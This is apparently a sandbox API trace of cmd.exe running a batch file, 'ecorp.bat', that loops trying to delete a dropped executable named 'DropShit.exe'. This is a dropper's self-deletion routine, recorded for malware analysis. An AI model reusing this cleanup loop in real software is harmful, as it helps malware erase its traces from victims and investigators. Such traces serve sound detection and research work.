[0092.089] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ec88 | out: lpMode=0x14ec88) returned 1 [0092.089] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.089] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14ecc8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ecc8*=0x2) returned 1 [0092.089] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9bc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0092.089] _vsnwprintf (in: _Buffer=0x4a9aeb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x14ed08 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0092.090] _vsnwprintf (in: _Buffer=0x4a9aebaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x14ed08 | out: _Buffer=">") returned 1 [0092.090] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.090] GetFileType (hFile=0x7) returned 0x2 [0092.090] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.090] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ecb8 | out: lpMode=0x14ecb8) returned 1 [0092.090] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.090] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9aeb60*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x14ecf8, lpReserved=0x0 | out: lpBuffer=0x4a9aeb60*, lpNumberOfCharsWritten=0x14ecf8*=0x26) returned 1 [0092.090] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.090] GetFileType (hFile=0x7) returned 0x2 [0092.090] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.090] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef98 | out: lpMode=0x14ef98) returned 1 [0092.091] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.091] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x27a300*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x14efd8, lpReserved=0x0 | out: lpBuffer=0x27a300*, lpNumberOfCharsWritten=0x14efd8*=0x3) returned 1 [0092.091] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14efd8 | out: _Buffer=" \"DropShit.exe\" ") returned 16 [0092.091] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.091] GetFileType (hFile=0x7) returned 0x2 [0092.091] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.091] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0092.091] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.091] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x10) returned 1 [0092.092] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14efd8 | out: _Buffer="\r\n") returned 2 [0092.092] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.092] GetFileType (hFile=0x7) returned 0x2 [0092.092] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.092] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0092.092] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.092] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x2) returned 1 [0092.092] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0092.092] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0092.093] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0092.093] GetConsoleTitleW (in: lpConsoleTitle=0x14ed00, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0092.093] GetProcessHeap () returned 0x250000 [0092.093] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x50) returned 0x268a10 [0092.093] GetProcessHeap () returned 0x250000 [0092.093] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x268a10, Size=0x30) returned 0x268a10 [0092.093] GetProcessHeap () returned 0x250000 [0092.093] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x268a10) returned 0x30 [0092.093] GetProcessHeap () returned 0x250000 [0092.093] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x38) returned 0x266aa0 [0092.093] GetProcessHeap () returned 0x250000 [0092.093] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x50) returned 0x268a50 [0092.093] GetProcessHeap () returned 0x250000 [0092.093] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x268a50, Size=0x30) returned 0x268a50 [0092.093] GetProcessHeap () returned 0x250000 [0092.093] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x268a50) returned 0x30 [0092.093] GetProcessHeap () returned 0x250000 [0092.093] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2a) returned 0x266ae0 [0092.093] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x14e860 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0092.093] GetProcessHeap () returned 0x250000 [0092.093] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x58) returned 0x268a90 [0092.093] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x14d770 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0092.093] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x14da28, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x14e280, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x14da28*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0092.093] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0092.094] GetProcessHeap () returned 0x250000 [0092.094] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x58) returned 0x26ccf0 [0092.094] GetProcessHeap () returned 0x250000 [0092.094] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x260) returned 0x2518c0 [0092.094] _wcsicmp (_String1="DropShit.exe", _String2=".") returned 54 [0092.094] _wcsicmp (_String1="DropShit.exe", _String2="..") returned 54 [0092.094] GetFileAttributesW (lpFileName="DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0x20 [0092.094] GetProcessHeap () returned 0x250000 [0092.094] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x218) returned 0x251b30 [0092.094] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x251b40 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0092.094] SetErrorMode (uMode=0x0) returned 0x0 [0092.094] SetErrorMode (uMode=0x1) returned 0x0 [0092.094] GetFullPathNameW (in: lpFileName="DropShit.exe", nBufferLength=0x104, lpBuffer=0x14d790, lpFilePart=0x14d780 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", lpFilePart=0x14d780*="DropShit.exe") returned 0x32 [0092.094] SetErrorMode (uMode=0x0) returned 0x1 [0092.094] GetProcessHeap () returned 0x250000 [0092.094] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x260) returned 0x26ef00 [0092.094] _wcsicmp (_String1="DropShit.exe", _String2=".") returned 54 [0092.094] _wcsicmp (_String1="DropShit.exe", _String2="..") returned 54 [0092.094] GetFileAttributesW (lpFileName="DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0x20 [0092.094] GetProcessHeap () returned 0x250000 [0092.094] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2a) returned 0x266b20 [0092.094] GetProcessHeap () returned 0x250000 [0092.094] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x5c) returned 0x26cd50 [0092.094] GetProcessHeap () returned 0x250000 [0092.094] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x5c) returned 0x26cdc0 [0092.094] GetProcessHeap () returned 0x250000 [0092.094] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x810) returned 0x26f170 [0092.094] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", fInfoLevelId=0x0, lpFindFileData=0x26f184, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f184) returned 0x251d50 [0092.095] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0 [0092.095] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0 [0092.095] GetLastError () returned 0x5 [0092.095] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x14dc38 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe\r\n") returned 52 [0092.095] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.095] GetFileType (hFile=0x7) returned 0x2 [0092.095] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.095] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14dbc8 | out: lpMode=0x14dbc8) returned 1 [0092.095] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.095] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x14dc08, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14dc08*=0x34) returned 1 [0092.096] _get_osfhandle (_FileHandle=2) returned 0xb [0092.096] GetFileType (hFile=0xb) returned 0x2 [0092.096] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0092.096] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14db68 | out: lpMode=0x14db68) returned 1 [0092.096] _get_osfhandle (_FileHandle=2) returned 0xb [0092.096] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x14dba0 | out: lpConsoleScreenBufferInfo=0x14dba0) returned 1 [0092.096] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x4a9c6340, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Access is denied.\r\n") returned 0x13 [0092.096] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x4a9c6340, nSize=0x2000, Arguments=0x14dc10 | out: lpBuffer="Access is denied.\r\n") returned 0x13 [0092.097] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x13, lpNumberOfCharsWritten=0x14db90, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14db90*=0x13) returned 1 [0092.097] FindNextFileW (in: hFindFile=0x251d50, lpFindFileData=0x26f184 | out: lpFindFileData=0x26f184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec7a8400, ftCreationTime.dwHighDateTime=0x1d53bb1, ftLastAccessTime.dwLowDateTime=0xed131a80, ftLastAccessTime.dwHighDateTime=0x1d53bb1, ftLastWriteTime.dwLowDateTime=0xeb495700, ftLastWriteTime.dwHighDateTime=0x1d53bb1, nFileSizeHigh=0x0, nFileSizeLow=0x9600, dwReserved0=0x0, dwReserved1=0x0, cFileName="DropShit.exe", cAlternateFileName="")) returned 0 [0092.097] GetLastError () returned 0x12 [0092.097] FindClose (in: hFindFile=0x251d50 | out: hFindFile=0x251d50) returned 1 [0092.097] GetProcessHeap () returned 0x250000 [0092.097] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26f170 | out: hHeap=0x250000) returned 1 [0092.097] GetProcessHeap () returned 0x250000 [0092.097] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cdc0 | out: hHeap=0x250000) returned 1 [0092.097] GetProcessHeap () returned 0x250000 [0092.097] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266b20 | out: hHeap=0x250000) returned 1 [0092.097] GetProcessHeap () returned 0x250000 [0092.097] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cd50 | out: hHeap=0x250000) returned 1 [0092.097] GetProcessHeap () returned 0x250000 [0092.097] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ef00 | out: hHeap=0x250000) returned 1 [0092.097] GetProcessHeap () returned 0x250000 [0092.097] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x251b30 | out: hHeap=0x250000) returned 1 [0092.097] GetProcessHeap () returned 0x250000 [0092.097] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2518c0 | out: hHeap=0x250000) returned 1 [0092.097] GetProcessHeap () returned 0x250000 [0092.097] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26ccf0 | out: hHeap=0x250000) returned 1 [0092.097] GetProcessHeap () returned 0x250000 [0092.098] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x268a90 | out: hHeap=0x250000) returned 1 [0092.098] GetProcessHeap () returned 0x250000 [0092.098] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266ae0 | out: hHeap=0x250000) returned 1 [0092.098] GetProcessHeap () returned 0x250000 [0092.098] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x268a50 | out: hHeap=0x250000) returned 1 [0092.098] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.098] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0092.098] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.098] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9ae194 | out: lpMode=0x4a9ae194) returned 1 [0092.098] _get_osfhandle (_FileHandle=0) returned 0x3 [0092.098] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9ae198 | out: lpMode=0x4a9ae198) returned 1 [0092.098] SetConsoleInputExeNameW () returned 0x1 [0092.098] GetConsoleOutputCP () returned 0x1b5 [0092.098] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9bbfe0 | out: lpCPInfo=0x4a9bbfe0) returned 1 [0092.098] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0092.099] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ecorp.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14ef58, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0092.099] _open_osfhandle (_OSFileHandle=0x5c, _Flags=8) returned 3 [0092.099] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.099] SetFilePointer (in: hFile=0x5c, lDistanceToMove=29, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1d [0092.099] GetProcessHeap () returned 0x250000 [0092.099] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266aa0 | out: hHeap=0x250000) returned 1 [0092.099] GetProcessHeap () returned 0x250000 [0092.099] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x268a10 | out: hHeap=0x250000) returned 1 [0092.099] GetProcessHeap () returned 0x250000 [0092.099] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266a60 | out: hHeap=0x250000) returned 1 [0092.099] GetProcessHeap () returned 0x250000 [0092.099] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27a2f0 | out: hHeap=0x250000) returned 1 [0092.099] GetProcessHeap () returned 0x250000 [0092.099] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cf30 | out: hHeap=0x250000) returned 1 [0092.099] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.099] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1d [0092.099] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x14ed60, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14ed60*=0x34, lpOverlapped=0x0) returned 1 [0092.099] SetFilePointer (in: hFile=0x5c, lDistanceToMove=66, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0092.099] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9bc320, cbMultiByte=37, lpWideCharStr=0x4a9be320, cchWideChar=8191 | out: lpWideCharStr="if exist \"DropShit.exe\" goto Repeat\r\n") returned 37 [0092.099] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.099] GetFileType (hFile=0x5c) returned 0x1 [0092.099] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.099] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0092.099] GetProcessHeap () returned 0x250000 [0092.099] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4012) returned 0x27c760 [0092.099] GetProcessHeap () returned 0x250000 [0092.099] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27c760 | out: hHeap=0x250000) returned 1 [0092.099] GetProcessHeap () returned 0x250000 [0092.099] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x26cf30 [0092.100] GetProcessHeap () returned 0x250000 [0092.100] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x16) returned 0x27a2f0 [0092.100] GetProcessHeap () returned 0x250000 [0092.100] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x28) returned 0x264610 [0092.100] GetProcessHeap () returned 0x250000 [0092.100] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x264610, Size=0x1e) returned 0x2645e0 [0092.100] GetProcessHeap () returned 0x250000 [0092.100] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x2645e0) returned 0x1e [0092.100] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0092.100] GetProcessHeap () returned 0x250000 [0092.100] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x26cff0 [0092.100] GetProcessHeap () returned 0x250000 [0092.100] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1c) returned 0x264610 [0092.100] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0092.100] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0092.100] GetProcessHeap () returned 0x250000 [0092.100] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2e) returned 0x266a60 [0092.100] GetProcessHeap () returned 0x250000 [0092.100] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4c) returned 0x268a10 [0092.100] GetProcessHeap () returned 0x250000 [0092.100] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x268a10, Size=0x30) returned 0x268a10 [0092.100] GetProcessHeap () returned 0x250000 [0092.100] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x268a10) returned 0x30 [0092.100] GetProcessHeap () returned 0x250000 [0092.100] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x26d0b0 [0092.100] GetProcessHeap () returned 0x250000 [0092.100] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1a) returned 0x278f90 [0092.100] GetProcessHeap () returned 0x250000 [0092.100] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x20) returned 0x278fc0 [0092.100] _tell (_FileHandle=3) returned 66 [0092.101] _close (_FileHandle=3) returned 0 [0092.101] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14ecf8 | out: _Buffer="\r\n") returned 2 [0092.101] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.101] GetFileType (hFile=0x7) returned 0x2 [0092.101] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.101] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ec88 | out: lpMode=0x14ec88) returned 1 [0092.101] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.101] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14ecc8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ecc8*=0x2) returned 1 [0092.102] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9bc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0092.102] _vsnwprintf (in: _Buffer=0x4a9aeb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x14ed08 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0092.102] _vsnwprintf (in: _Buffer=0x4a9aebaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x14ed08 | out: _Buffer=">") returned 1 [0092.102] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.102] GetFileType (hFile=0x7) returned 0x2 [0092.102] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.102] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ecb8 | out: lpMode=0x14ecb8) returned 1 [0092.102] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.102] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9aeb60*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x14ecf8, lpReserved=0x0 | out: lpBuffer=0x4a9aeb60*, lpNumberOfCharsWritten=0x14ecf8*=0x26) returned 1 [0092.102] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14efd8 | out: _Buffer="if ") returned 3 [0092.102] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.102] GetFileType (hFile=0x7) returned 0x2 [0092.103] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.103] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0092.103] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.103] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x3) returned 1 [0092.103] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s %s ", _ArgList=0x14efa8 | out: _Buffer="exist \"DropShit.exe\" ") returned 21 [0092.103] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.103] GetFileType (hFile=0x7) returned 0x2 [0092.103] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.103] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef38 | out: lpMode=0x14ef38) returned 1 [0092.104] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.104] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x14ef78, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ef78*=0x15) returned 1 [0092.104] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.104] GetFileType (hFile=0x7) returned 0x2 [0092.104] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.104] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0092.104] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.104] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x278fa0*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x278fa0*, lpNumberOfCharsWritten=0x14efa8*=0x4) returned 1 [0092.104] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14efa8 | out: _Buffer=" Repeat ") returned 8 [0092.104] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.104] GetFileType (hFile=0x7) returned 0x2 [0092.105] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.105] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef38 | out: lpMode=0x14ef38) returned 1 [0092.105] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.105] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x14ef78, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ef78*=0x8) returned 1 [0092.105] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14efd8 | out: _Buffer="\r\n") returned 2 [0092.105] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.105] GetFileType (hFile=0x7) returned 0x2 [0092.105] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.105] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0092.105] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.105] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x2) returned 1 [0092.106] GetFullPathNameW (in: lpFileName="DropShit.exe", nBufferLength=0x208, lpBuffer=0x14eae0, lpFilePart=0x14e880 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", lpFilePart=0x14e880*="DropShit.exe") returned 0x32 [0092.106] wcsncmp (_String1="C:\\U", _String2="\\\\.\\", _MaxCount=0x4) returned -25 [0092.106] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", fInfoLevelId=0x1, lpFindFileData=0x14e890, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e890) returned 0x268a50 [0092.106] FindClose (in: hFindFile=0x268a50 | out: hFindFile=0x268a50) returned 1 [0092.106] GetConsoleTitleW (in: lpConsoleTitle=0x14ec40, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0092.106] GetProcessHeap () returned 0x250000 [0092.106] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x30) returned 0x266aa0 [0092.106] GetProcessHeap () returned 0x250000 [0092.106] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x266aa0, Size=0x20) returned 0x278ff0 [0092.106] GetProcessHeap () returned 0x250000 [0092.106] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x278ff0) returned 0x20 [0092.106] GetProcessHeap () returned 0x250000 [0092.106] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2a) returned 0x266aa0 [0092.107] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ecorp.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14e6f8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0092.107] 